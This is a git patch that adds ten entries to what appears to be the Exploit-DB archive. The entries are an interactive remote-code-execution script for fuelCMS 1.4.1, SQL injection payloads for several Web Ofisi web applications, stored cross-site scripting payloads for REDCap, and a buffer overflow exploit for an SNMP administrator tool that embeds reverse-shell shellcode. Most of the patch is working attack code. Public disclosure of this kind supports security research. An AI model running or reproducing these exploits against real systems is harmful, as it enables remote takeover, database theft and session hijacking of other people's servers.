From 7ec7ea72dee160087aa22cfd7355c1fda49861de Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 20 Jul 2019 05:02:15 +0000
Subject: [PATCH] DB: 2019-07-20

10 changes to exploits/shellcodes

MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
fuelCMS 1.4.1 - Remote Code Execution
Web Ofisi E-Ticaret 3 - 'a' SQL Injection
Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
Web Ofisi Emlak 2 - 'ara' SQL Injection
Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
Web Ofisi Rent a Car 3 - 'klima' SQL Injection
Web Ofisi Firma 13 - 'oz' SQL Injection
REDCap < 9.1.2 - Cross-Site Scripting
---
 exploits/linux/webapps/47138.py      |  34 +++++++
 exploits/linux/webapps/47139.txt     |  14 +++
 exploits/linux/webapps/47140.txt     |  21 +++++
 exploits/linux/webapps/47141.txt     |  14 +++
 exploits/linux/webapps/47142.txt     |  50 ++++++++++
 exploits/linux/webapps/47143.txt     |  15 +++
 exploits/linux/webapps/47144.txt     |  43 +++++++++
 exploits/linux/webapps/47145.txt     |  13 +++
 exploits/php/webapps/47146.txt       |  60 ++++++++++++
 exploits/windows_x86/remote/47137.py | 136 +++++++++++++++++++++++++++
 files_exploits.csv                   |  10 ++
 11 files changed, 410 insertions(+)
 create mode 100755 exploits/linux/webapps/47138.py
 create mode 100644 exploits/linux/webapps/47139.txt
 create mode 100644 exploits/linux/webapps/47140.txt
 create mode 100644 exploits/linux/webapps/47141.txt
 create mode 100644 exploits/linux/webapps/47142.txt
 create mode 100644 exploits/linux/webapps/47143.txt
 create mode 100644 exploits/linux/webapps/47144.txt
 create mode 100644 exploits/linux/webapps/47145.txt
 create mode 100644 exploits/php/webapps/47146.txt
 create mode 100755 exploits/windows_x86/remote/47137.py

diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py
new file mode 100755
index 000000000..971baab76
--- /dev/null
+++ b/exploits/linux/webapps/47138.py
@@ -0,0 +1,34 @@
+# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Date: 2019-07-19
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+
+import requests
+import urllib
+
+url = "http://127.0.0.1:8881"
+def find_nth_overlapping(haystack, needle, n):
+    start = haystack.find(needle)
+    while start >= 0 and n > 1:
+        start = haystack.find(needle, start+1)
+        n -= 1
+    return start
+
+while 1:
+	xxxx = raw_input('cmd:')
+	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
+	proxy = {"http":"http://127.0.0.1:8080"}
+	r = requests.get(burp0_url, proxies=proxy)
+
+	html = "<!DOCTYPE html>"
+	htmlcharset = r.text.find(html)
+
+	begin = r.text[0:20]
+	dup = find_nth_overlapping(r.text,begin,2)
+
+	print r.text[0:dup]
\ No newline at end of file
diff --git a/exploits/linux/webapps/47139.txt b/exploits/linux/webapps/47139.txt
new file mode 100644
index 000000000..b8d7f16b9
--- /dev/null
+++ b/exploits/linux/webapps/47139.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html
+# Demo Site: http://demobul.net/eticaretv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?a=
+Vulnerable Parameter: a (GET)
+Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf%
\ No newline at end of file
diff --git a/exploits/linux/webapps/47140.txt b/exploits/linux/webapps/47140.txt
new file mode 100644
index 000000000..57c3fdb22
--- /dev/null
+++ b/exploits/linux/webapps/47140.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html
+# Demo Site: http://demobul.net/eticaretv5/
+# Version: v5
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/arama?kategori=&q=
+Vulnerable Parameter: q (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/ajax/productsFilterSearch
+Vulnerable Parameter: q (POST)
+Payload:
+kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1
\ No newline at end of file
diff --git a/exploits/linux/webapps/47141.txt b/exploits/linux/webapps/47141.txt
new file mode 100644
index 000000000..d3bf8ec78
--- /dev/null
+++ b/exploits/linux/webapps/47141.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
+# Demo Site: http://demobul.net/emlakv2/
+# Version: v2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?ara=
+Vulnerable Parameter: ara (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47142.txt b/exploits/linux/webapps/47142.txt
new file mode 100644
index 000000000..d238692fb
--- /dev/null
+++ b/exploits/linux/webapps/47142.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html
+# Demo Site: http://demobul.net/emlakv3/
+# Version: V2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_durumu (GET)
+Payload: -1' OR 3*2*1=6 AND 000744=000744 --
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_tipi (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: il (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: ilce (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: kelime (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 6: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: semt (GET)
+Payload: -1' OR 3*2*1=6 AND 000531=000531 --
\ No newline at end of file
diff --git a/exploits/linux/webapps/47143.txt b/exploits/linux/webapps/47143.txt
new file mode 100644
index 000000000..c166342a0
--- /dev/null
+++ b/exploits/linux/webapps/47143.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html
+# Demo Site: http://demobul.net/firma-rehberi-v1/
+# Version: v1
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request:
+http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni
+Vulnerable Parameters: il,kelime,kat (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47144.txt b/exploits/linux/webapps/47144.txt
new file mode 100644
index 000000000..b0f169f23
--- /dev/null
+++ b/exploits/linux/webapps/47144.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
+# Demo Site: http://demobul.net/rentacarv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: kategori[] (GET)
+Payload: if(now()=sysdate(),sleep(0),0)
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: klima[] (GET)
+Payload: 1 AND 3*2*1=6 AND 695=695
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: yakit[] (GET)
+Payload: 1 AND 3*2*1=6 AND 602=602
\ No newline at end of file
diff --git a/exploits/linux/webapps/47145.txt b/exploits/linux/webapps/47145.txt
new file mode 100644
index 000000000..b6da6ab60
--- /dev/null
+++ b/exploits/linux/webapps/47145.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
+# Demo Site: http://demobul.net/firmav13/
+# Version: v13
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
+Vulnerable Parameters: oz[] (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/php/webapps/47146.txt b/exploits/php/webapps/47146.txt
new file mode 100644
index 000000000..987fbb85b
--- /dev/null
+++ b/exploits/php/webapps/47146.txt
@@ -0,0 +1,60 @@
+# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting
+# Date: 2019-07-19
+# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://projectredcap.org
+# Software Link: https://projectredcap.org
+# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
+# Tested on: 9.1.0
+# CVE: CVE-2019-13029
+# Security advisory: https://gitlab.com/snippets/1874216
+
+### Stored XSS n°1 – Project name (found by Dylan GARNAUD)
+
+Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.
+
+- Where? In project name
+- Payload: `<BODY onKeyPress=alert("xss")>`
+- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages.
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified
+
+### Stored XSS n°2 – Calendar (found by Dylan GARNAUD)
+
+- Where? Calendar event
+- Payload: `<BODY onKeyPress=alert("xss")>`
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12
+
+### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD)
+
+- Where? Wherever there is a CSV upload feature with displayed parsed results
+- Payload:
+  ```csv
+  record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete
+  <script>alert("upload xss")</script>,,
+  ```
+- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered.
+- Privileges: It requires admin privileges to store it.
+- URL examples of execution:
+  + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index
+  + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16
+
+### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI)
+
+- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue)
+- Payload: `</textarea><svg/onload='alert("XSS survey queue")'>`
+- Privileges: It requires admin privileges to store it.
+- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16
+
+### Stored XSS n°5 – Survey (found by Alexandre ZANNI)
+
+- Where? In the survey management system.
+  + Store: One has to select a project, go in the *Designer* section, choose *Survey Settings* and then store the payload in the WYSIWYG editor section named *Survey Instructions* (the same happens for *Survey Completion Text*).
+  + Execute: Anyone who consults the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, will trigger the XSS.
+- Payload:
+  ```html
+  <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert('Survey XSS')</SCRIPT>"></BODY></HTML>
+  ```
+- Privileges:
+  + Store: It requires admin privileges to store it.
+  + Execute: Any unauthenticated user that can consult a survey.
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/47137.py b/exploits/windows_x86/remote/47137.py
new file mode 100755
index 000000000..3144dedf0
--- /dev/null
+++ b/exploits/windows_x86/remote/47137.py
@@ -0,0 +1,136 @@
+# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
+# Author: sasaga92
+# Discovery Date: 2019-07-18
+# Vendor Homepage: www.computerlab.com
+# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
+# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
+# Tested on OS: Windows XP SP2 x86
+# CVE: N/A
+# [+] Credits: John Page (aka hyp3rlinx)  
+
+
+#!/usr/bin/python
+
+import sys
+import socket
+import random
+import string
+import struct
+
+
+
+def pattern_create(_type,_length):
+  _type = _type.split(" ")
+
+  if _type[0] == "trash":
+    return _type[1] * _length
+  elif _type[0] == "random":
+    return ''.join(random.choice(string.lowercase) for i in range(_length))
+  elif _type[0] == "pattern":
+    _pattern = ''
+    _parts = ['A', 'a', '0']
+    while len(_pattern) != _length:
+      _pattern += _parts[len(_pattern) % 3]
+      if len(_pattern) % 3 == 0:
+        _parts[2] = chr(ord(_parts[2]) + 1)
+        if _parts[2] > '9':
+          _parts[2] = '0'
+          _parts[1] = chr(ord(_parts[1]) + 1)
+          if _parts[1] > 'z':
+            _parts[1] = 'a'
+            _parts[0] = chr(ord(_parts[0]) + 1)
+            if _parts[0] > 'Z':
+              _parts[0] = 'A'
+    return _pattern
+  else:
+    return "Not Found"
+
+def pwned(_host, _port, _payload):
+  print "[*] Conectandose a {0}:{1}...".format(_host, _port)
+  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  s.connect((_host, _port))
+  print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
+  _payload = "{0}\r\n\r\n".format(_payload)
+  s.send(_payload)
+  _data = s.recv(1024)
+  s.shutdown
+  s.close
+  print 'Recibido:', repr(_data)
+  print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))
+
+
+def main():
+
+  _host = "192.168.0.12"
+  _port = 987
+  _offset_eip = 642200
+  _padding = 642144
+  _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
+  _tag = "w00tw00t"
+
+  #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
+  _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
+    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+    "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
+    "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
+    "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
+    "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
+    "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
+    "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
+    "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
+    "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
+    "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
+    "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
+    "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
+    "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
+    "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
+    "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
+    "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
+    "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
+    "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
+    "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
+    "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
+    "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
+    "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
+    "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
+    "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
+    "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
+    "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
+    "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
+    "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
+    "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
+    "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
+    "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
+    "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
+    "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
+    "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
+    "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
+    "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
+    "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
+    "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
+    "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
+    "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
+    "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
+    "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
+    "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
+    "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
+    "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
+    "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
+    "\x70\x73\x63\x69\x6f\x59\x45\x41\x41")
+
+  _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+ 
+  _inject =  pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
+  _inject += _tag
+  _inject += _shellcode
+  _inject += _egghunter
+  _inject +=  pattern_create("trash B", _offset_eip-len(_inject))
+  _inject += _eip
+  
+  print(_inject)
+  pwned(_host,_port,_inject)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8692a374b..19425eec4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17560,6 +17560,7 @@ id,file,description,date,author,type,platform,port
 47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
+47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41514,3 +41515,12 @@ id,file,description,date,author,type,platform,port
 47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
 47132,exploits/linux/webapps/47132.txt,"Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting",2019-07-17,"Sarath Nair",webapps,linux,
 47136,exploits/linux/webapps/47136.txt,"WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting",2019-07-18,LiquidWorm,webapps,linux,
+47138,exploits/linux/webapps/47138.py,"fuelCMS 1.4.1 - Remote Code Execution",2019-07-19,0xd0ff9,webapps,linux,
+47139,exploits/linux/webapps/47139.txt,"Web Ofisi E-Ticaret 3 - 'a' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47140,exploits/linux/webapps/47140.txt,"Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47141,exploits/linux/webapps/47141.txt,"Web Ofisi Emlak 2 - 'ara' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47142,exploits/linux/webapps/47142.txt,"Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47143,exploits/linux/webapps/47143.txt,"Web Ofisi Firma Rehberi 1 - 'il' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47144,exploits/linux/webapps/47144.txt,"Web Ofisi Rent a Car 3 - 'klima' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux,
+47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php,